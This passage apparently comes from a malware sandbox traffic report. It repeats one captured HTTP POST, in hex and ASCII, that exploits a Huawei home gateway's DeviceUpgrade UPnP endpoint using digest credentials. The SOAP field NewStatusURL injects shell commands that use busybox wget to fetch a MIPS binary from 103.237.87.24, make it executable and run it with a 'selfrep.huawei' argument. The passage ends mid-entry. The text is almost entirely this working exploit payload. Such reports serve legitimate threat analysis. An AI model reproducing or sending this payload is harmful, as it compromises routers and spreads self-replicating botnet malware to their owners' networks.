103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 